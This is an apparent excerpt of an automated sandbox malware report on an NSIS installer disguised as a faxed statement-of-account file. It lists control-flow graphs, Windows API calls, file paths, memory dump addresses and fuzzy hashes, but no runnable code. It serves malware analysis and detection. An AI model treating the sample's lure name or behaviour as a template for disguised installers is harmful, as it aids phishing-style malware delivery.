                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                              • String ID: H7B${
                                                                                              • API String ID: 590372296-2256286769
                                                                                              • Opcode ID: 153ff5dc364a6c7c2e50f1b489f7107bf33a64f1d0900c26a8f10ec1720b826b
                                                                                              • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                                                              • Opcode Fuzzy Hash: 153ff5dc364a6c7c2e50f1b489f7107bf33a64f1d0900c26a8f10ec1720b826b
                                                                                              • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 666 406d5f-406d64 667 406dd5-406df3 666->667 668 406d66-406d95 666->668 669 4073cb-4073e0 667->669 670 406d97-406d9a 668->670 671 406d9c-406da0 668->671 672 4073e2-4073f8 669->672 673 4073fa-407410 669->673 674 406dac-406daf 670->674 675 406da2-406da6 671->675 676 406da8 671->676 679 407413-40741a 672->679 673->679 677 406db1-406dba 674->677 678 406dcd-406dd0 674->678 675->674 676->674 680 406dbc 677->680 681 406dbf-406dcb 677->681 682 406fa2-406fc0 678->682 683 407441-40744d 679->683 684 40741c-407420 679->684 680->681 685 406e35-406e63 681->685 689 406fc2-406fd6 682->689 690 406fd8-406fea 682->690 693 406be3-406bec 683->693 686 407426-40743e 684->686 687 4075cf-4075d9 684->687 694 406e65-406e7d 685->694 695 406e7f-406e99 685->695 686->683 692 4075e5-4075f8 687->692 691 406fed-406ff7 689->691 690->691 696 406ff9 691->696 697 406f9a-406fa0 691->697 701 4075fd-407601 692->701 698 406bf2 693->698 699 4075fa 693->699 700 406e9c-406ea6 694->700 695->700 717 407581-40758b 696->717 718 406f7f-406f97 696->718 697->682 707 406f3e-406f48 697->707 703 406bf9-406bfd 698->703 704 406d39-406d5a 698->704 705 406c9e-406ca2 698->705 706 406d0e-406d12 698->706 699->701 708 406eac 700->708 709 406e1d-406e23 700->709 703->692 710 406c03-406c10 703->710 704->669 719 406ca8-406cc1 705->719 720 40754e-407558 705->720 711 406d18-406d2c 706->711 712 40755d-407567 706->712 713 40758d-407597 707->713 714 406f4e-407117 707->714 726 406e02-406e1a 708->726 727 407569-407573 708->727 715 406ed6-406edc 709->715 716 406e29-406e2f 709->716 710->699 725 406c16-406c5c 710->725 728 406d2f-406d37 711->728 712->692 713->692 714->693 723 406f3a 715->723 724 406ede-406efc 715->724 716->685 716->723 717->692 718->697 722 406cc4-406cc8 719->722 720->692 722->705 730 406cca-406cd0 722->730 723->707 731 406f14-406f26 724->731 732 406efe-406f12 724->732 733 406c84-406c86 725->733 734 406c5e-406c62 725->734 726->709 727->692 728->704 728->706 735 406cd2-406cd9 730->735 736 406cfa-406d0c 730->736 737 406f29-406f33 731->737 732->737 740 406c94-406c9c 733->740 741 406c88-406c92 733->741 738 406c64-406c67 GlobalFree 734->738 739 406c6d-406c7b GlobalAlloc 734->739 742 406ce4-406cf4 GlobalAlloc 735->742 743 406cdb-406cde GlobalFree 735->743 736->728 737->715 744 406f35 737->744 738->739 739->699 745 406c81 739->745 740->722 741->740 741->741 742->699 742->736 743->742 747 407575-40757f 744->747 748 406ebb-406ed3 744->748 745->733 747->692 748->715
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                              • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                                                              • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                              • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(74DF3420,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,74DF3420,?,74DF2EE0,00405D94,?,74DF3420,74DF2EE0), ref: 004069A9
                                                                                              • FindClose.KERNEL32(00000000), ref: 004069B5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
                                                                                              • String ID:
                                                                                              • API String ID: 2295610775-0
                                                                                              • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                              • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                                                              • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                              • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 194 4040c5-4040d7 195 4040dd-4040e3 194->195 196 40423e-40424d 194->196 195->196 197 4040e9-4040f2 195->197 198 40429c-4042b1 196->198 199 40424f-404297 GetDlgItem * 2 call 4045c4 SetClassLongW call 40140b 196->199 203 4040f4-404101 SetWindowPos 197->203 204 404107-40410e 197->204 201 4042f1-4042f6 call 404610 198->201 202 4042b3-4042b6 198->202 199->198 216 4042fb-404316 201->216 206 4042b8-4042c3 call 401389 202->206 207 4042e9-4042eb 202->207 203->204 209 404110-40412a ShowWindow 204->209 210 404152-404158 204->210 206->207 233 4042c5-4042e4 SendMessageW 206->233 207->201 215 404591 207->215 217 404130-404143 GetWindowLongW 209->217 218 40422b-404239 call 40462b 209->218 212 404171-404174 210->212 213 40415a-40416c DestroyWindow 210->213 223 404176-404182 SetWindowLongW 212->223 224 404187-40418d 212->224 221 40456e-404574 213->221 222 404593-40459a 215->222 227 404318-40431a call 40140b 216->227 228 40431f-404325 216->228 217->218 219 404149-40414c ShowWindow 217->219 218->222 219->210 221->215 229 404576-40457c 221->229 223->222 224->218 232 404193-4041a2 GetDlgItem 224->232 227->228 230 40432b-404336 228->230 231 40454f-404568 DestroyWindow EndDialog 228->231 229->215 236 40457e-404587 ShowWindow 229->236 230->231 237 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 230->237 231->221 238 4041c1-4041c4 232->238 239 4041a4-4041bb SendMessageW IsWindowEnabled 232->239 233->222 236->215 266 404393-4043cf ShowWindow KiUserCallbackDispatcher call 4045e6 EnableWindow 237->266 267 40438b-404390 237->267 241 4041c6-4041c7 238->241 242 4041c9-4041cc 238->242 239->215 239->238 244 4041f7-4041fc call 40459d 241->244 245 4041da-4041df 242->245 246 4041ce-4041d4 242->246 244->218 249 404215-404225 SendMessageW 245->249 251 4041e1-4041e7 245->251 246->249 250 4041d6-4041d8 246->250 249->218 250->244 254 4041e9-4041ef call 40140b 251->254 255 4041fe-404207 call 40140b 251->255 262 4041f5 254->262 255->218 264 404209-404213 255->264 262->244 264->262 270 4043d1-4043d2 266->270 271 4043d4 266->271 267->266 272 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 404406-404417 SendMessageW 272->273 274 404419 272->274 275 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 273->275 274->275 275->216 286 404464-404466 275->286 286->216 287 40446c-404470 286->287 288 404472-404478 287->288 289 40448f-4044a3 DestroyWindow 287->289 288->215 290 40447e-404484 288->290 289->221 291 4044a9-4044d6 CreateDialogParamW 289->291 290->216 292 40448a 290->292 291->221 293 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->215 293->215 298 404535-404548 ShowWindow call 404610 293->298 300 40454d 298->300 300->221
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                                                              • ShowWindow.USER32(?), ref: 00404121
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                                                              • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                                                              • DestroyWindow.USER32 ref: 00404160
                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404179
                                                                                              • GetDlgItem.USER32(?,?), ref: 00404198
                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                                                              • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 0040425E
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00404268
                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00404282
                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00404379
                                                                                              • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043AC
                                                                                              • EnableWindow.USER32(?,?), ref: 004043C7
                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                                                              • EnableMenuItem.USER32(00000000), ref: 004043E4
                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                                                              • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                                                              • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                              • String ID: H7B
                                                                                              • API String ID: 121052019-2300413410
                                                                                              • Opcode ID: 2f4dad2f818047668635e16f952da299a81014d83ff1599baf972819d0fbfd0c
                                                                                              • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                                                              • Opcode Fuzzy Hash: 2f4dad2f818047668635e16f952da299a81014d83ff1599baf972819d0fbfd0c
                                                                                              • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 301 403d17-403d2f call 406a35 304 403d31-403d41 call 4065af 301->304 305 403d43-403d7a call 406536 301->305 314 403d9d-403dc6 call 403fed call 40603f 304->314 310 403d92-403d98 lstrcatW 305->310 311 403d7c-403d8d call 406536 305->311 310->314 311->310 319 403e58-403e60 call 40603f 314->319 320 403dcc-403dd1 314->320 326 403e62-403e69 call 4066a5 319->326 327 403e6e-403e93 LoadImageW 319->327 320->319 321 403dd7-403dff call 406536 320->321 321->319 328 403e01-403e05 321->328 326->327 330 403f14-403f1c call 40140b 327->330 331 403e95-403ec5 RegisterClassW 327->331 332 403e17-403e23 lstrlenW 328->332 333 403e07-403e14 call 405f64 328->333 344 403f26-403f31 call 403fed 330->344 345 403f1e-403f21 330->345 334 403fe3 331->334 335 403ecb-403f0f SystemParametersInfoW CreateWindowExW 331->335 339 403e25-403e33 lstrcmpiW 332->339 340 403e4b-403e53 call 405f37 call 406668 332->340 333->332 338 403fe5-403fec 334->338 335->330 339->340 343 403e35-403e3f GetFileAttributesW 339->343 340->319 348 403e41-403e43 343->348 349 403e45-403e46 call 405f83 343->349 354 403f37-403f51 ShowWindow call 4069c5 344->354 355 403fba-403fbb call 40579d 344->355 345->338 348->340 348->349 349->340 362 403f53-403f58 call 4069c5 354->362 363 403f5d-403f6f GetClassInfoW 354->363 359 403fc0-403fc2 355->359 360 403fc4-403fca 359->360 361 403fdc-403fde call 40140b 359->361 360->345 364 403fd0-403fd7 call 40140b 360->364 361->334 362->363 367 403f71-403f81 GetClassInfoW RegisterClassW 363->367 368 403f87-403faa DialogBoxParamW call 40140b 363->368 364->345 367->368 372 403faf-403fb8 call 403c67 368->372 372->338
                                                                                              APIs
                                                                                                • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                                • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                              • lstrcatW.KERNEL32(1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403D98
                                                                                              • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\floddeltaers,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,74DF3420), ref: 00403E18
                                                                                              • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\floddeltaers,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                                                              • GetFileAttributesW.KERNEL32(: Completed,?,00000000,?), ref: 00403E36
                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\floddeltaers), ref: 00403E7F
                                                                                                • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                              • RegisterClassW.USER32(00429200), ref: 00403EBC
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F09
                                                                                              • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403F6B
                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403F78
                                                                                              • RegisterClassW.USER32(00429200), ref: 00403F81
                                                                                              • DialogBoxParamW.USER32(?,00000000,004040C5,00000000), ref: 00403FA0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: .DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\floddeltaers$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                              • API String ID: 1975747703-3791216846
                                                                                              • Opcode ID: 220f140aa4de50ee9124e2eb98a4ec8a38239a674bfba3edeef84c1295dabbb0
                                                                                              • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                                                              • Opcode Fuzzy Hash: 220f140aa4de50ee9124e2eb98a4ec8a38239a674bfba3edeef84c1295dabbb0
                                                                                              • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 375 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 378 403120-403125 375->378 379 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 375->379 380 40336a-40336e 378->380 387 403243-403251 call 40302e 379->387 388 40315e 379->388 394 403322-403327 387->394 395 403257-40325a 387->395 390 403163-40317a 388->390 392 40317c 390->392 393 40317e-403187 call 4035e2 390->393 392->393 401 40318d-403194 393->401 402 4032de-4032e6 call 40302e 393->402 394->380 397 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 395->397 398 40325c-403274 call 4035f8 call 4035e2 395->398 421 4032d4-4032d9 397->421 422 4032e8-403318 call 4035f8 call 403371 397->422 398->394 424 40327a-403280 398->424 406 403210-403214 401->406 407 403196-4031aa call 406113 401->407 402->394 411 403216-40321d call 40302e 406->411 412 40321e-403224 406->412 407->412 427 4031ac-4031b3 407->427 411->412 418 403233-40323b 412->418 419 403226-403230 call 406b22 412->419 418->390 423 403241 418->423 419->418 421->380 436 40331d-403320 422->436 423->387 424->394 424->397 427->412 428 4031b5-4031bc 427->428 428->412 431 4031be-4031c5 428->431 431->412 433 4031c7-4031ce 431->433 433->412 435 4031d0-4031f0 433->435 435->394 437 4031f6-4031fa 435->437 436->394 438 403329-40333a 436->438 439 403202-40320a 437->439 440 4031fc-403200 437->440 441 403342-403347 438->441 442 40333c 438->442 439->412 443 40320c-40320e 439->443 440->423 440->439 444 403348-40334e 441->444 442->441 443->412 444->444 445 403350-403368 call 406113 444->445 445->380
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 004030E4
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe,00000400), ref: 00403100
                                                                                                • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe,80000000,00000003), ref: 0040615C
                                                                                                • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe,C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe,80000000,00000003), ref: 00403149
                                                                                              • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$t
                                                                                              • API String ID: 2803837635-1774948046
                                                                                              • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                              • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                                                              • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                              • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
